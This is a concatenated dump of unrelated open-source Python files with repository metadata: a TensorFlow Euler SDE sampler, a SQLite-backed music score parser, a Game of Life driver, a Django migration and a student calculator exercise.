`time_step` are supplied or if both are supplied.
(b) If `normal_draws` is supplied and `dim` is mismatched.
tf.errors.InvalidArgumentError: If `normal_draws` is supplied and
`num_time_steps` is mismatched.
"""
name = name or 'euler_sample'
with tf.name_scope(name):
times = tf.convert_to_tensor(times, dtype=dtype)
if dtype is None:
dtype = times.dtype
asserts = []
if tolerance is None:
tolerance = 1e-10 if dtype == tf.float64 else 1e-6
tolerance = tf.convert_to_tensor(tolerance, dtype=dtype)
if validate_args:
asserts.append(
tf.assert_greater(
times[1:], times[:-1] + tolerance,
message='`times` increments should be greater '
'than tolerance {0}'.format(tolerance)))
if initial_state is None:
initial_state = tf.zeros(dim, dtype=dtype)
initial_state = tf.convert_to_tensor(initial_state, dtype=dtype,
name='initial_state')
batch_shape = tff_utils.get_shape(initial_state)[:-2]
num_requested_times = tff_utils.get_shape(times)[0]
# Create a time grid for the Euler scheme.
if num_time_steps is not None and time_step is not None:
raise ValueError(
'When `times_grid` is not supplied only one of either '
'`num_time_steps` or `time_step` should be defined but not both.')
if times_grid is None:
if time_step is None:
if num_time_steps is None:
raise ValueError(
'When `times_grid` is not supplied, either `num_time_steps` '
'or `time_step` should be defined.')
num_time_steps = tf.convert_to_tensor(
num_time_steps, dtype=tf.int32, name='num_time_steps')
time_step = times[-1] / tf.cast(num_time_steps, dtype=dtype)
else:
time_step = tf.convert_to_tensor(time_step, dtype=dtype,
name='time_step')
else:
times_grid = tf.convert_to_tensor(times_grid, dtype=dtype,
name='times_grid')
if validate_args:
asserts.append(
tf.assert_greater(
times_grid[1:], times_grid[:-1] + tolerance,
message='`times_grid` increments should be greater '
'than tolerance {0}'.format(tolerance)))
times, keep_mask, time_indices = utils.prepare_grid(
times=times,
time_step=time_step,
num_time_steps=num_time_steps,
times_grid=times_grid,
tolerance=tolerance,
dtype=dtype)
if normal_draws is not None:
normal_draws = tf.convert_to_tensor(normal_draws, dtype=dtype,
name='normal_draws')
# Shape [num_time_points] + batch_shape + [num_samples, dim]
normal_draws_rank = normal_draws.shape.rank
perm = tf.concat(
[[normal_draws_rank-2], tf.range(normal_draws_rank-2),
[normal_draws_rank-1]], axis=0)
normal_draws = tf.transpose(normal_draws, perm=perm)
num_samples = tf.shape(normal_draws)[-2]
draws_dim = normal_draws.shape[-1]
if dim != draws_dim:
raise ValueError(
'`dim` should be equal to `normal_draws.shape[2]` but are '
'{0} and {1} respectively'.format(dim, draws_dim))
if validate_args:
draws_times = tff_utils.get_shape(normal_draws)[0]
asserts.append(tf.assert_equal(
draws_times, tf.shape(keep_mask)[0] - 1,
message='`num_time_steps` should be equal to '
'`tf.shape(normal_draws)[1]`'))
if validate_args:
with tf.control_dependencies(asserts):
times = tf.identity(times)
if watch_params is not None:
watch_params = [tf.convert_to_tensor(param, dtype=dtype)
for param in watch_params]
return _sample(
dim=dim,
batch_shape=batch_shape,
drift_fn=drift_fn,
volatility_fn=volatility_fn,
times=times,
keep_mask=keep_mask,
num_requested_times=num_requested_times,
num_samples=num_samples,
initial_state=initial_state,
random_type=random_type,
seed=seed,
swap_memory=swap_memory,
skip=skip,
precompute_normal_draws=precompute_normal_draws,
normal_draws=normal_draws,
watch_params=watch_params,
time_indices=time_indices,
dtype=dtype)
def _sample(*,
dim,
batch_shape,
drift_fn,
volatility_fn,
times,
keep_mask,
num_requested_times,
num_samples,
initial_state,
random_type,
seed, swap_memory,
skip,
precompute_normal_draws,
watch_params,
time_indices,
normal_draws,
dtype):
"""Returns a sample of paths from the process using Euler method."""
dt = times[1:] - times[:-1]
sqrt_dt = tf.sqrt(dt)
# current_state.shape = batch_shape + [num_samples, dim]
current_state = initial_state + tf.zeros([num_samples, dim], dtype=dtype)
steps_num = tff_utils.get_shape(dt)[-1]
wiener_mean = None
if normal_draws is None:
# In order to use low-discrepancy random_type we need to generate the
# sequence of independent random normals upfront. We also precompute random
# numbers for stateless random type in order to ensure independent samples
# for multiple function calls whith different seeds.
if precompute_normal_draws or random_type in (
random.RandomType.SOBOL,
random.RandomType.HALTON,
random.RandomType.HALTON_RANDOMIZED,
random.RandomType.STATELESS,
random.RandomType.STATELESS_ANTITHETIC):
normal_draws = utils.generate_mc_normal_draws(
num_normal_draws=dim, num_time_steps=steps_num,
num_sample_paths=num_samples, batch_shape=batch_shape,
random_type=random_type, dtype=dtype, seed=seed, skip=skip)
wiener_mean = None
else:
# If pseudo or anthithetic sampling is used, proceed with random sampling
# at each step.
wiener_mean = tf.zeros((dim,), dtype=dtype, name='wiener_mean')
normal_draws = None
if watch_params is None:
# Use while_loop if `watch_params` is not passed
return _while_loop(
steps_num=steps_num,
current_state=current_state,
drift_fn=drift_fn, volatility_fn=volatility_fn, wiener_mean=wiener_mean,
num_samples=num_samples, times=times,
dt=dt, sqrt_dt=sqrt_dt, keep_mask=keep_mask,
num_requested_times=num_requested_times,
swap_memory=swap_memory,
random_type=random_type, seed=seed, normal_draws=normal_draws,
dtype=dtype)
else:
# Use custom for_loop if `watch_params` is specified
return _for_loop(
batch_shape=batch_shape, steps_num=steps_num,
current_state=current_state,
drift_fn=drift_fn, volatility_fn=volatility_fn, wiener_mean=wiener_mean,
num_samples=num_samples, times=times,
dt=dt, sqrt_dt=sqrt_dt, time_indices=time_indices,
keep_mask=keep_mask, watch_params=watch_params,
random_type=random_type, seed=seed, normal_draws=normal_draws)
def _while_loop(*, steps_num, current_state,
drift_fn, volatility_fn, wiener_mean,
num_samples, times, dt, sqrt_dt, num_requested_times,
keep_mask, swap_memory, random_type, seed, normal_draws, dtype):
"""Sample paths using tf.while_loop."""
written_count = 0
if isinstance(num_requested_times, int) and num_requested_times == 1:
record_samples = False
result = current_state
else:
# If more than one sample has to be recorded, create a TensorArray
record_samples = True
element_shape = current_state.shape
result = tf.TensorArray(dtype=dtype,
size=num_requested_times,
element_shape=element_shape,
clear_after_read=False)
# Include initial state, if necessary
result = result.write(written_count, current_state)
written_count += tf.cast(keep_mask[0], dtype=tf.int32)
# Define sampling while_loop body function
def cond_fn(i, written_count, *args):
# It can happen that `times_grid[-1] > times[-1]` in which case we have
# to terminate when `written_count` reaches `num_requested_times`
del args
return tf.math.logical_and(i < steps_num,
written_count < num_requested_times)
def step_fn(i, written_count, current_state, result):
return _euler_step(
i=i,
written_count=written_count,
current_state=current_state,
result=result,
drift_fn=drift_fn,
volatility_fn=volatility_fn,
wiener_mean=wiener_mean,
num_samples=num_samples,
times=times,
dt=dt,
sqrt_dt=sqrt_dt,
keep_mask=keep_mask,
random_type=random_type,
seed=seed,
normal_draws=normal_draws,
record_samples=record_samples)
# Sample paths
_, _, _, result = tf.while_loop(
cond_fn, step_fn, (0, written_count, current_state, result),
maximum_iterations=steps_num,
swap_memory=swap_memory)
if not record_samples:
# shape batch_shape + [num_samples, 1, dim]
return tf.expand_dims(result, axis=-2)
# Shape [num_time_points] + batch_shape + [num_samples, dim]
result = result.stack()
# transpose to shape batch_shape + [num_samples, num_time_points, dim]
n = result.shape.rank
perm = list(range(1, n-1)) + [0, n - 1]
return tf.transpose(result, perm)
def _for_loop(*, batch_shape, steps_num, current_state,
drift_fn, volatility_fn, wiener_mean, watch_params,
num_samples, times, dt, sqrt_dt, time_indices,
keep_mask, random_type, seed, normal_draws):
"""Sample paths using custom for_loop."""
del batch_shape
num_time_points = time_indices.shape.as_list()[:-1]
if isinstance(num_time_points, int) and num_time_points == 1:
iter_nums = steps_num
else:
iter_nums = time_indices
def step_fn(i, current_state):
# Unpack current_state
current_state = current_state[0]
_, _, next_state, _ = _euler_step(
i=i,
written_count=0,
current_state=current_state,
result=current_state,
drift_fn=drift_fn,
volatility_fn=volatility_fn,
wiener_mean=wiener_mean,
num_samples=num_samples,
times=times,
dt=dt,
sqrt_dt=sqrt_dt,
keep_mask=keep_mask,
random_type=random_type,
seed=seed,
normal_draws=normal_draws,
record_samples=False)
return [next_state]
result = custom_loops.for_loop(
body_fn=step_fn,
initial_state=[current_state],
params=watch_params,
num_iterations=iter_nums)[0]
if num_time_points == 1:
return tf.expand_dims(result, axis=-2)
# result.shape=[num_time_points] + batch_shape + [num_samples, dim]
# transpose to shape=batch_shape + [num_time_points, num_samples, dim]
n = result.shape.rank
perm = list(range(1, n-1)) + [0, n - 1]
return tf.transpose(result, perm)
def _euler_step(*, i, written_count, current_state,
drift_fn, volatility_fn, wiener_mean,
num_samples, times, dt, sqrt_dt, keep_mask,
random_type, seed, normal_draws, result,
record_samples):
"""Performs one step of Euler scheme."""
current_time = times[i + 1]
written_count = tf.cast(written_count, tf.int32)
if normal_draws is not None:
dw = normal_draws[i]
else:
dw = random.mv_normal_sample(
(num_samples,), mean=wiener_mean, random_type=random_type,
seed=seed)
dw = dw * sqrt_dt[i]
dt_inc = dt[i] * drift_fn(current_time, current_state) # pylint: disable=not-callable
dw_inc = tf.linalg.matvec(volatility_fn(current_time, current_state), dw) # pylint: disable=not-callable
next_state = current_state + dt_inc + dw_inc
if record_samples:
result = result.write(written_count, next_state)
else:
result = next_state
written_count += tf.cast(keep_mask[i + 1], dtype=tf.int32)
return i + 1, written_count, next_state, result
__all__ = ['sample']
| [
"tf-quant-finance-robot@google.com"
] | tf-quant-finance-robot@google.com |
a821a6aa4773d3bfcef21fe0686736f02a750663 | c9d444386d8c8b33915a25155b17e8532fd64c59 | /03-persistent_data/scorelib.py | ce97689519a6243c38719bb99c14edc53da6a623 | [] | no_license | xkustan/PV248 | 45ca890786399ab2671b34bf0776bd24ab91f917 | e3e97a1fea3d0a4e65368facf28f4a758e9609a8 | refs/heads/master | 2020-03-29T19:53:55.781537 | 2019-01-14T22:09:06 | 2019-01-14T22:09:06 | 150,284,380 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,682 | py | import re
from sqlite3 import IntegrityError
class Person(object):
def __init__(self, name, born, died, type):
self.name = name
self.born = born
self.died = died
self.type = type
def __repr__(self):
return "{0} ({1}--{2})".format(self.name, self.born, self.died)
def insert_or_update_to_db(self, db_conn):
cur = db_conn.cursor()
insert_sql = "INSERT INTO person(name, born, died) VALUES (?, ?, ?);"
try:
cur.execute(insert_sql, (self.name, self.born, self.died))
db_conn.commit()
return cur.lastrowid
except IntegrityError:
cur.execute("SELECT * FROM person WHERE name = ?", (self.name,))
person_list = cur.fetchall()
if len(person_list) != 1:
raise Exception("Integrity broken!")
person = person_list[0]
new_born = person[1] if person[1] is not None else self.born # person[1] is born column in DB
new_died = person[2] if person[2] is not None else self.died # person[2] is died column in DB
person_id = person[0]
cur.execute("UPDATE person SET born = ?, died = ? WHERE id = ?", (new_born, new_died, person_id))
db_conn.commit()
return person_id
class Editor(Person):
def __init__(self, name=None, born=None, died=None):
Person.__init__(self, name, born, died, "editor")
def create_from_text(self, text_editor):
tmp_name, *rest = text_editor.split("(")
self.name = tmp_name.strip().strip("[").strip("]")
if self.name.strip() == "":
self.name = None
class Composer(Person):
def __init__(self, name=None, born=None, died=None):
Person.__init__(self, name, born, died, "composer")
def create_from_text(self, text_composer):
text_composer = text_composer.strip()
tmp_name, *rest = text_composer.split("(")
self.name = tmp_name.strip()
if self.name.strip() == "":
self.name = None
# normal range
parsed = re.search("(\d\d\d\d--\d\d\d\d)", text_composer)
if parsed:
b, d = parsed.group().split("--")
self.born, self.died = int(b), int(d)
return
# born start with *
parsed = re.search("\*\d\d\d\d", text_composer)
if parsed:
self.born = int(parsed.group()[1:6])
return
# died start with +
parsed = re.search("\+\d\d\d\d", text_composer)
if parsed:
self.died = int(parsed.group()[1:6])
return
parsed = re.search("(--\d\d\d\d)", text_composer)
if parsed:
b, d = parsed.group().split("--")
self.born, self.died = None, int(d)
return
parsed = re.search("(\d\d\d\d--)", text_composer)
if parsed:
b, d = parsed.group().split("--")
self.born, self.died = int(b), None
return
class Voice(object):
def __init__(self, name=None, range=None):
self.name = name
self.range = range
def __repr__(self):
return "{0}, {1}".format(self.range, self.name)
def create_from_text(self, text_voice):
if "--" in text_voice:
temp_range, *temp_name = text_voice.split(",", maxsplit=1)
if temp_name:
self.name = temp_name[0].strip()
else:
self.name = None
self.range = temp_range.strip()
else:
text_voice = text_voice.strip()
if text_voice.startswith("None, "):
self.range = None
self.name = text_voice.lstrip("None,").strip()
else:
self.name = text_voice
class Composition(object):
def __init__(self, name=None, incipit=None, key=None, genre=None, year=None, voices=None, authors=None):
self.name = name
self.incipit = incipit
self.key = key
self.genre = genre
self.year = year
self.voices = voices or []
self.authors = authors or []
def set_composers(self, text_value):
if ";" in text_value:
composers = [c.strip() for c in text_value.split(";")]
elif "r/F" in text_value:
composers = [c.strip() for c in text_value.split("/")]
elif "&" in text_value:
composers = [c.strip() for c in text_value.split("&")]
elif text_value.strip()[0] == "[":
composers = [c.strip() for c in text_value.strip()[1:-1].split("),")]
else:
composers = [text_value.strip()]
for comp in composers:
composer = Composer()
composer.create_from_text(comp)
if composer.name:
self.authors.append(composer)
def set_name(self, text_value):
self.name = text_value
def set_genre(self, text_value):
self.genre = text_value
def set_key(self, text_value):
self.key = text_value
def set_year(self, text_value):
try:
if int(text_value) in range(999, 10000):
self.year = text_value
else:
raise ValueError
except ValueError:
self.year = None
def set_incipit(self, text_value):
self.incipit = text_value
def add_voice(self, text_value):
voice = Voice()
voice.create_from_text(text_value)
self.voices.append(voice)
def insert_to_db(self, db_conn, composer_ids):
cur = db_conn.cursor()
get_sql = """SELECT * FROM score left join voice on score.id = voice.score
WHERE score.name = ? AND ifnull(genre, '') = ? AND ifnull(key, '') = ? AND ifnull(incipit, '') = ?
AND ifnull(year, 0) = ? AND ifnull(range, '') = ? AND ifnull(voice.name, '') = ?;"""
cur.execute(get_sql, (
self.name,
self.genre if self.genre else '',
self.key if self.key else '',
self.incipit if self.incipit else '',
self.year if self.year else 0,
self.voices[0].range if self.voices and self.voices[0].range else '',
self.voices[0].name if self.voices and self.voices[0].name else ''
))
score_voice = cur.fetchall()
if score_voice:
score_id = score_voice[0][0]
return score_id
try:
insert_sql = "INSERT INTO score(name, genre, key, incipit, year) VALUES (?, ?, ?, ?, ?);"
cur.execute(insert_sql, (self.name, self.genre, self.key, self.incipit, self.year))
db_conn.commit()
score_id = cur.lastrowid
# store relation info into score_author table
for composer in composer_ids:
cur.execute("INSERT INTO score_author(score, composer) VALUES (?, ?);", (score_id, composer))
db_conn.commit()
# store voices
voice_insert_sql = "INSERT INTO voice(number, score, range, name) VALUES (?, ?, ?, ?);"
for number, voice in enumerate(self.voices):
cur.execute(voice_insert_sql, (number + 1, score_id, voice.range, voice.name))
db_conn.commit()
return score_id
except IntegrityError:
print("INTEGRITY ERROR!")
class Edition(object):
def __init__(self, composition=None, authors=None, name=None):
self.composition = composition or self._create_default_composition()
self.authors = authors or []
self.name = name
@staticmethod
def _create_default_composition():
return Composition()
def add_name(self, text_value):
self.name = text_value.strip()
def add_authors(self, text_value):
text_value = text_value.strip()
if "continuo by" in text_value:
editors = [e.strip() for e in text_value.split(", continuo by")]
elif "continuo" in text_value:
editors = [e.strip() for e in text_value.split(", continuo")]
elif "," in text_value:
editors = []
edis = [e.strip() for e in text_value.split(",")]
if " " in edis[0]:
editors.extend(edis)
else:
for i in range(0, len(edis), 2):
editors.append(edis[i] + " " + edis[i + 1])
else:
editors = [text_value]
for edo in editors:
editor = Editor()
editor.create_from_text(edo)
if editor.name:
self.authors.append(editor)
def insert_to_db(self, db_conn, score_id, editor_ids):
cur = db_conn.cursor()
insert_sql = "INSERT INTO edition(score, name, year) VALUES (?, ?, null);"
cur.execute(insert_sql, (score_id, self.name))
db_conn.commit()
edition_id = cur.lastrowid
# store relation info into score_author table
for editor in editor_ids:
cur.execute("INSERT INTO edition_author(edition, editor) VALUES (?, ?);", (edition_id, editor))
db_conn.commit()
return edition_id
class Print(object):
def __init__(self, print_id, edition=None, partiture=None):
self.print_id = print_id
self.edition = edition or self._create_default_edition()
self.partiture = partiture
@staticmethod
def _create_default_edition():
return Edition()
def composition(self):
return self.edition.composition
def format(self):
voice_prints = []
for i, voice in enumerate(self.edition.composition.voices):
voice_prints.append(VOICE_TEMPLATE.format(i + 1, voice))
if voice_prints:
printed_voice = "\n" + "\n".join(voice_prints)
else:
printed_voice = ""
to_print = PRINT_TEMPLATE.format(
self.print_id,
self.edition.composition.authors,
self.edition.composition.name,
self.edition.composition.genre,
self.edition.composition.key,
self.edition.composition.year,
self.edition.name,
self.edition.authors,
printed_voice,
self.partiture,
self.edition.composition.incipit,
)
print(to_print)
def set_partiture_from_text(self, text_value):
if text_value.strip() in ("yes", "True"):
self.partiture = True
elif text_value.strip() in ("no", "False"):
self.partiture = False
else:
self.partiture = None
def save_to_db(self, db_conn, edition_id):
cur = db_conn.cursor()
try:
cur.execute("INSERT INTO print(id, partiture, edition) VALUES (?, ?, ?);", (
self.print_id,
"Y" if self.partiture else "N",
edition_id
))
db_conn.commit()
except IntegrityError:
print("INTEGRITY ERROR!")
def my_hash(self):
voices = "-".join([str(x) for x in self.edition.composition.voices]).replace(" ", "")
authors = "-".join([str(x) for x in self.edition.composition.authors]).replace(" ", "")
editors = "-".join([str(x) for x in self.edition.authors]).replace(" ", "")
return "_".join([
authors,
self.edition.composition.name or "",
self.edition.composition.genre or "",
self.edition.composition.key or "",
self.edition.composition.year or "",
self.edition.composition.incipit or "",
self.edition.name or "",
editors,
voices
]).replace(" ", "")
def parse_text(pattern, line):
parsed_line = re.match(pattern, line)
if parsed_line:
parsed_text = parsed_line.group(2)
parsed_text = parsed_text.strip() if parsed_text else None
if parsed_text == "":
return None
return parsed_text
def parse_line(line):
patterns = {
"print": re.compile("(Print Number: )(.*)"),
"composer": re.compile("(Composer: )(.*)"),
"title": re.compile("(Title: )(.*)"),
"genre": re.compile("(Genre: )(.*)"),
"key": re.compile("(Key: )(.*)"),
"composition_year": re.compile("(Composition Year: )(.*)"),
"edition": re.compile("(Edition: )(.*)"),
"editor": re.compile("(Editor: )(.*)"),
"voice": re.compile("(Voice \d: )(.*)"),
"partiture": re.compile("(Partiture: )(.*)"),
"incipit": re.compile("(Incipit: )(.*)"),
}
if line == "\n":
return {
"type": "newline",
"value": None,
}
for line_type, pattern in patterns.items():
parsed_line = parse_text(pattern, line)
if parsed_line:
return {
"type": line_type,
"value": parsed_line,
}
def load(file_path):
prints = []
with open(file_path, "r") as file:
p = None
for line in file:
parsed = parse_line(line)
if not parsed:
continue
parsed_type = parsed["type"]
parsed_value = parsed["value"]
if parsed_type == "print":
p = Print(int(parsed_value))
prints.append(p)
if parsed_type == "composer":
p.edition.composition.set_composers(parsed_value)
if parsed_type == "title":
p.edition.composition.set_name(parsed_value)
if parsed_type == "genre":
p.edition.composition.set_genre(parsed_value)
if parsed_type == "key":
p.edition.composition.set_key(parsed_value)
if parsed_type == "composition_year":
p.edition.composition.set_year(parsed_value)
if parsed_type == "edition":
p.edition.add_name(parsed_value)
if parsed_type == "editor":
p.edition.add_authors(parsed_value)
if parsed_type == "voice":
p.edition.composition.add_voice(parsed_value)
if parsed_type == "partiture":
p.set_partiture_from_text(parsed_value)
if parsed_type == "incipit":
p.edition.composition.set_incipit(parsed_value)
# just to be sure
if parsed_type == "newline":
p = None
file.close()
return prints
PRINT_TEMPLATE = """Print Number: {0}
Composer: {1}
Title: {2}
Genre: {3}
Key: {4}
Composition Year: {5}
Edition: {6}
Editor: {7}{8}
Partiture: {9}
Incipit: {10}
"""
VOICE_TEMPLATE = """Voice {0}: {1}"""
| [
"xenia.kustanova@gmail.com"
] | xenia.kustanova@gmail.com |
bcb0037d4f7cc33669d33e6a9923c20a32b17b0f | ad33e5ffc85afee383e9c0dad0a7d2121c209419 | /main.py | e463af873e9794c43541696aa914a2dd00bbca70 | [] | no_license | prebenas/Conways-game-of-life | 1490c720942ca028906911715a480c1e8bbbaea9 | 1d0d58580774ace8b565609c3b2713d245c6275a | refs/heads/master | 2021-04-27T10:21:59.885063 | 2018-02-22T21:31:36 | 2018-02-22T21:31:36 | 122,535,985 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 958 | py | #Importerer metoder og funksjoner fra andre klasser
from celle import *
from spillebrett import *
#Definerer hovedprogrammet hvor objektene opprettes og meny-loekken som vises
#i terminal. Lager og en while loekke slik at bruker kan se saa mange
#generasjoner han/hun vil av brettet.
def hovedprogram():
rader = int(input("Skriv inn antall rader: "))
kolonner = int(input("Skriv inn antall kolonner: "))
brett1 = Spillebrett(rader, kolonner)
print("\nGenerasjon: 0")
print("Antall levende celler: ", brett1.finnAntallLevende())
brett1.tegnBrett()
while True:
valg = input("\nTrykk enter for aa gaa videre \neller 'q' for aa avslutte:\n")
if valg == "":
print("Generasjon:", brett1.oppdatering())
print("Antall levende celler: ", brett1.finnAntallLevende())
brett1.tegnBrett()
elif valg.lower() == "q":
break
#Kaller paa hovedprogram metoden
hovedprogram() | [
"36746214+prebenas@users.noreply.github.com"
] | 36746214+prebenas@users.noreply.github.com |
c7a74916f1e6d989b248ccac707b5b4cfd0c712f | 0978dbebbafb7fc2b3b3360ec7c009bce2eaa574 | /djangular/posts/migrations/0001_initial.py | cbcac89176b82a7190a41bc8b284eda2c5e361f3 | [] | no_license | kranthikiran01/django-angular-boilerplate | 16ef7845b4ee9a51dea48292cd203788797587f1 | 223e8ba5d17b3a249019dfd334f41779fc8fb88e | refs/heads/master | 2021-01-10T07:59:59.140135 | 2016-01-01T08:40:00 | 2016-01-01T08:40:00 | 48,660,063 | 0 | 4 | null | null | null | null | UTF-8 | Python | false | false | 931 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2015-12-29 20:20
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.TextField()),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"guduru.kranthikiran@gmail.com"
] | guduru.kranthikiran@gmail.com |
c630418404934fda72a338034fb4c3f08f834a76 | 72f41e2a5c2f5a6af543e2390abefd21688830dc | /calculator.py | 32f8a794ab06078fb24ff1fae32d67270b9aec68 | [] | no_license | miratava/hyperskill-python-calculator | c3d0fdcb7435d600cc9f1e78b732a564e8470b91 | bc97b2d1f1bb6e39926bd7fc678c978763562b0a | refs/heads/master | 2022-12-04T12:46:57.205149 | 2020-08-07T17:57:56 | 2020-08-07T17:57:56 | 285,639,855 | 0 | 0 | null | 2020-08-07T17:57:57 | 2020-08-06T18:11:56 | Python | UTF-8 | Python | false | false | 12,326 | py | #hyperskill smart calculator project
import re
import enum
class Status(enum.Enum):
exit = 0
help = 1
unknown_command = 2
is_empty = 3
has_equal = 4
invalid_expression = 5
invalid_identifier = 6
unknown_variable = 7
invalid_assignment = 8
ok = 9
division_by_zero = 10
class Calculator:
help_message = (Status.help, "This program can add and subtract numbers")
help_command = "/help"
exit_command = "/exit"
unknown_command = (Status.unknown_command, "Unknown command")
unknown_variable = (Status.unknown_variable, "Unknown variable")
invalid_expression = (Status.invalid_expression, "Invalid expression")
invalid_identifier = (Status.invalid_identifier, "Invalid identifier")
invalid_assignment = (Status.invalid_assignment, "Invalid assignment")
division_by_zero = (Status.division_by_zero, "Division by zero")
exit_bye = (Status.exit, "Bye")
plus = "+"
minus = "-"
def __init__(self):
self.numbers = []
self.expression = ""
self.string = ""
self.left_part = ""
self.right_part = ""
self.variables = {}
def clear(self):
self.numbers = []
@staticmethod
def substract(num1, num2):
return num1 - num2
@staticmethod
def add(num1, num2):
return num1 + num2
@staticmethod
def multiply(num1, num2):
return num1 * num2
def divide(self, numerator, denominator):
if denominator == 0:
return self.division_by_zero
else:
return Status.ok, numerator // denominator
def is_command(self):
if self.string.startswith("/"):
return True
return False
def is_help(self):
if self.string == self.help_command:
return True
return False
def is_exit(self):
if self.is_command() and self.string == self.exit_command:
return True
return False
def is_empty(self):
if self.string == "":
return True
return False
def is_valid_command(self):
if self.is_help() or self.is_exit():
return True
return False
def is_assignment_expression(self):
if "=" in self.string:
return True
return False
def split_expression(self, expression):
expression = expression + " "
number_str = ""
variable = ""
split_expression = []
i = 0
while i < len(expression):
if expression[i].isdigit():
while expression[i].isdigit():
number_str += expression[i]
i += 1
split_expression.append(number_str)
number_str = ""
elif expression[i].isalpha():
while expression[i].isalpha():
variable += expression[i]
i += 1
number = self.variables[variable]
split_expression.append(str(number))
variable = ""
elif expression[i] == " ":
i += 1
elif expression[i] == ")" or "(":
split_expression.append(expression[i])
i += 1
else:
split_expression.append(expression[i])
i += 1
return Status.ok, split_expression
def split(self):
split_by_equal = self.string.split("=")
self.left_part = split_by_equal[0].strip()
self.right_part = split_by_equal[1].strip()
@staticmethod
def is_sign(item):
re_expression = "((-|\+)*|(\*|/){1,1})"
pattern_string = re.compile(re_expression)
if pattern_string.match(item):
return True
return False
def get_value_from_dict(self, item):
if item in self.variables:
number = self.variables[item]
return Status.ok, number
return self.unknown_variable
def validate_assignment(self):
self.split()
if self.left_part.isalpha():
if self.right_part.isalpha():
return self.get_value_from_dict(self.right_part)
if self.right_part.isdigit():
return Status.ok, self.right_part
return self.invalid_assignment
return self.invalid_identifier
def execute_assignment_expression(self):
status, value = self.validate_assignment()
if self.string.count("=") == 1:
if status == Status.ok:
self.variables[self.left_part] = value
return Status.ok, None
return status, value
return self.invalid_assignment
def execute_command(self):
if self.is_help():
return self.help_message
if self.is_exit():
return self.exit_bye
return self.unknown_command
def validate_number_parentheses(self):
parentheses = []
number_parentheses = 0
for char in self.string:
if char == "(":
parentheses.append(char)
number_parentheses += 1
elif char == ")":
try:
parentheses.pop()
except IndexError:
return self.invalid_expression
if not parentheses:
return Status.ok, number_parentheses
return self.invalid_expression
def check_expression_is_variable(self, expression):
if expression.isalpha():
if expression in self.variables:
return Status.ok, str(self.variables[expression])
return self.unknown_variable
return Status.ok, None
def validate_parentheses_expression(self, expression):
status, value = self.check_expression_is_variable(expression)
if value is None:
try:
return Status.ok, int(expression)
except ValueError:
variables = "|".join(self.variables.keys()) + "|"
if variables == "|":
variables = ""
operand_expression = "(" + variables + "\d+)"
re_expression = "(\+|-)?" + operand_expression + \
"\s*(((\+|-)+|(\*|/){1,1})\s*" + operand_expression + ")+"
pattern_string = re.compile(re_expression)
if pattern_string.match(expression):
status, value = Status.ok, expression
else:
status, value = self.invalid_expression
return status, value
def do_some_fucking_magic(self):
parentheses = ""
i = 0
index_start = 0
if "(" and ")" not in self.string:
index_end = len(self.string)
else:
while self.string[i] != ")":
char = self.string[i]
if parentheses == "":
if char == "(":
index_start = i + 1
else:
if char == "(":
index_start = i + 1
parentheses = ""
i += 1
index_end = i
expression_indexes = [index_start, index_end]
return Status.ok, expression_indexes
def check_parentheses_expression(self):
status, value = self.do_some_fucking_magic()
start_index = value[0]
end_index = value[1]
expression = self.string[start_index: end_index]
status, value = self.validate_parentheses_expression(expression)
if status == Status.ok:
value = [start_index, end_index]
return status, value
def replace_parentheses_by_number(self):
status, value = self.check_parentheses_expression()
start_index = value[0]
end_index = value[1]
if status is Status.ok:
status, value = self.split_expression(self.string[start_index:end_index])
if status is Status.ok:
status, value = self.execute_calculation_expression_parentheses(value)
if start_index != 0:
self.string = self.string[:start_index - 1] + str(value) + self.string[end_index + 1:]
return status, None
return status, value
def execute_calculation_expression(self):
status, value = self.validate_number_parentheses()
if status == Status.ok:
while len(self.string) > 0:
status, value = self.replace_parentheses_by_number()
if value is not None:
break
return status, value
def get_variable_value(self, item):
first = 0
second = 1
if item.isalpha():
if item in self.variables:
return self.get_value_from_dict(item)
return self.unknown_variable
if item[first] == self.plus and item[second:].isalpha():
variable = item[second:]
if variable in self.variables:
return Status.ok, str(self.get_value_from_dict(variable))
return self.unknown_variable
if item[first] == self.minus and item[second:].isalpha():
variable = item[second:]
if variable in self.variables:
return Status.ok, str((-1) * self.get_value_from_dict(variable))
return self.unknown_variable
return Status.ok, item
def convert_digit_to_int(self, item):
try:
number = int(item)
return Status.ok, number
except ValueError:
if self.is_sign(item):
return Status.ok, None
return self.invalid_assignment
def add_numbers_to_list(self, split_expression):
numbers = []
status, value = Status.ok, numbers
for item in split_expression:
status, value = self.get_variable_value(item)
if status == Status.ok:
status, value = self.convert_digit_to_int(value)
if status is Status.ok and value is not None:
numbers.append(value)
if status == Status.ok:
value = numbers
return status, value
def execute_calculation_expression_parentheses(self, split_expression):
status, numbers = self.add_numbers_to_list(split_expression)
multiply = "*"
division = "/"
signs = [x for x in split_expression if split_expression.index(x) % 2 == 1]
while len(signs) > 0:
if multiply in signs:
index = signs.index(multiply)
numbers[index] = self.multiply(numbers[index], numbers[index + 1])
numbers.pop(index + 1)
signs.pop(index)
elif division in signs:
index = signs.index(division)
status, value = self.divide(numbers[index], numbers[index + 1])
numbers[index] = value
numbers.pop(index + 1)
signs.pop(index)
else:
for item in signs:
index = signs.index(item)
if self.minus in item:
if signs[index].count(self.minus) % 2 == 1:
numbers[index] = self.substract(numbers[index], numbers[index + 1])
else:
numbers[index] = self.add(numbers[index], numbers[index + 1])
numbers.pop(index + 1)
signs.pop(index)
number = numbers.pop()
return Status.ok, number
def read_input_data(self, input_str):
self.clear()
self.string = input_str.strip()
if self.is_empty():
return Status.is_empty, None
if self.is_command():
return self.execute_command()
if self.is_assignment_expression():
return self.execute_assignment_expression()
return self.execute_calculation_expression()
def main():
calculator = Calculator()
while not calculator.is_exit():
expression = input()
result = calculator.read_input_data(expression)
if result[0] == Status.exit:
print(result[1])
break
else:
if result[1] is not None:
print(result[1])
continue
main()
| [
"miratava@gmail.com"
